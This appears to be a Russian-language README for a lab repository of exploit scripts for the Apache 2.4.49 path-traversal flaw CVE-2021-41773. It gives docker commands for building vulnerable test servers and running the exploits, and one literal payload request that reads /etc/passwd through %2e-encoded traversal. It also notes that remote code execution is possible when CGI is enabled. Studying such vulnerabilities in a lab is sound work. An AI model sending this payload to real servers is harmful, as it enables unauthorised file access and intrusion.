
Скрипты эксплойта для уязвимости обхода каталога Apache HTTP Server 2.4.49 (CVE-2021-41773), позволяющие обход пути и потенциальное RCE через специально созданные HTTP-запросы.
docker-compose up -d --build vuln-server-no-cgid
python no-cgid/exploit.py
docker-compose up -d --build vuln-server-cgid-sh
python cgid-sh/exploit.py
Уязвимость directory traversal в Apache HTTP Server 2.4.49. Возникает, когда не установлено Require all denied.
При получении URL, закодированного с помощью %2e, разрешается доступ к родительским каталогам. Пример: GET /cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Если CGI включён, возможна RCE.
Существует уязвимость Apache HTTP Server 2.4.50 CVE-2021-42013, возникшая из-за недостаточного исправления данной уязвимости.